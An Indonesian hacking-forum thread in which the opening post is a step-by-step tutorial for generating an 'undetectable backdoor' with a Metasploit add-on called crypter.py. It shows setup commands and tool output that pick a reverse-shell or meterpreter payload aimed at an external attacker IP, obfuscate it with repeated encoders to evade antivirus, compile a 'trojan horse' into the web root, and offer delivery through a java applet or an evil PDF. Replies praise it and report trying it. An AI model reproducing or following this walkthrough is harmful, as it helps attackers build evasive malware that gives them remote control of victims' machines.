undetectable-backdoor with crypter.py
#1
sempet thread ini di close ama staff ane repost lagi nih thread nya ... hehehehe, maaf ya kakak. Big Grin
ok deh, kemaren sore dapet tutorial dari si "larcenciels a.k.a winnerawan tito" tentang backdooring yang menggunakan tools tambahan crypter.py di /opt/metasploit/msf3 Smile


ok pertama download filenya di sini... http://technicdynamic.com/wp-content/upl...script.zip , terus di ekstrak semua file dan simpen di directory /opt/metasploit/msf3/ .
jangan lupa di chmod crypter.py nya

me@gnomeselpa:/opt/metasploit/msf3#chmod +x crypter.py

sebelumnya harus memiliki dependencies sebagai berikut:

mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

tapi lantaran kita make backtrack, sudah terinstal dulu nih dependencies nya, kalo belum ya tinggal install doank

apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

ok cara ngejalaninnya ./crypter.py
otomatis kalo ngejalaninnya di directory /opt/metasploit/msf3 Big Grin
me@gnomeselpa:/opt/metasploit/msf3#./crypter.py

**************************************
__ __ __ ___ __
/ / / / / \ / _ \ / /
/ / / /__/ /\ \/ / \ \/ /
/ / / ___ / \ / \ /
/ /_____/ / / / / / / /\ \
/_________/ /_/ /_/ /_/ \_\

**************************************
Crypter for metasploit
**************************************
lhost (e for external ip) ?e
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 14 0 14 0 0 27 0 --:--:-- --:--:-- --:--:-- 33

[*] lhost: 222.124.1.210
lport ?443


**************************************
1) windows/shell_reverse_tcp
2) windows/shell/reverse_tcp
3) windows/shell/reverse_tcp_dns
4) windows/shell/reverse_http
5) windows/meterpreter/reverse_tcp
6) windows/meterpreter/reverse_tcp_dns
7) windows/meterpreter/reverse_http
**************************************
Select a payload (1-8):1

Select a payload (1-8):1
[*] Generating random junk...
[*] Randomizing file size...
[*] Generating metasploit shellcode...
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 476 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 503 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 530 (iteration=8)

[*] x86/alpha_upper succeeded with size 1129 (iteration=1)

[*] x86/alpha_upper succeeded with size 2327 (iteration=2)

[*] x86/countdown succeeded with size 2345 (iteration=1)

[*] x86/countdown succeeded with size 2363 (iteration=2)

[*] x86/countdown succeeded with size 2381 (iteration=3)

[*] x86/countdown succeeded with size 2399 (iteration=4)

[*] Encoding with XOR key: 0xd2
[*] Obfuscating shellcode...
[*] Compiling trojan horse...
[*] Stripping out the debugging symbols...
[*] Moving trojan horse to web root...
**************************************
1) apache server
2) java applet attack
3) create evil PDF
**************************************
Select an attack (1-n):


ini sekalian ane titip video youtube nya kalo mau lebih kelanjutan attacking nya..

http://www.youtube.com/watch?feature=pla...964EIe-sFc

mungkin ini aja dulu thread dari ane ya mimin..
note: maap yak, kagak ane bikin ss nya, karena koneksi ane lelet banget.. Big Grin
wassalam. Big Grin

sumber : http://technicdynamic.com/2012/04/hackin...-backdoor/
Quote:~ Tan Hana Wighna Tan Sirna ~

#2
nice share omz...
ke TKP bentar omz...

#3
makasih om... Smile
siip ????
Quote:~ Tan Hana Wighna Tan Sirna ~

#4
nah kan kalo di bikin tutorial enak Smile +1 dari ane

#5
cakep Smile
ikutan nyoba ah Confused
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#6
msih dettect d avira ane m, tp mntap ni tutorial... mksih dah share om.. Smile

#7
(10-29-2012, 12:23 AM)xsan-lahci Wrote: nah kan kalo di bikin tutorial enak Smile +1 dari ane

wakakakakakakakaka..
iya om Big Grin
hehehehehe,,, maap .
#colek dikit ah Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~

#8
mantep nih coba ahhkkk
+1 \m/ \m/ \m/ \m/
alpoah@IBTeam:~#


Power Off BODOH

#9
(12-11-2012, 11:23 AM)alpoah Wrote: mantep nih coba ahhkkk
+1 \m/ \m/ \m/ \m/

Wah makasih lagi ni om ane di kasi cendol lagi Smile
nice your my spirit Big Grin << apalah Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~

#10
Wew.. Backdoor di bahas juga disini.. Hadeuh.. Mantap om.. Smile
<p>=========Cyberly================

Indonesian Backtrack Team Regional Aceh

" Walau diam tetap belajar"

GPComp</p>






Users browsing this thread: 1 Guest(s)